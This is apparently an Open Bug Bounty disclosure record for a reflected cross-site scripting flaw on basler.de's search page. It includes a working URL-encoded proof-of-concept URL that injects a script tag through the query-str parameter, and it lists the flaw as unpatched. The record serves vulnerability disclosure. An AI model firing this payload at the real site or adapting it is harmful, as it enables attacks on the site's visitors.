basler.de XSS vulnerability

2015-11-13T09:40:00
ID OBB:105244
Type openbugbounty
Reporter Inetizen01K
Modified 2015-11-15T06:48:00

Description

Vulnerable URL:
https://www.basler.de/privatkunden/suche.html?query-str=%22%2F%3E%3CscRiPT%3Ealert%28%22XSSPOSED%22%29%3B%3C%2FscriPT%3E&gsaMaxResults;=5
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1000202
Google Pagerank| 4
VIP website status:| No
Check basler.de SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 13 November, 2015 09:40 GMT
Vulnerability existence verified and confirmed| 15 November, 2015 06:48 GMT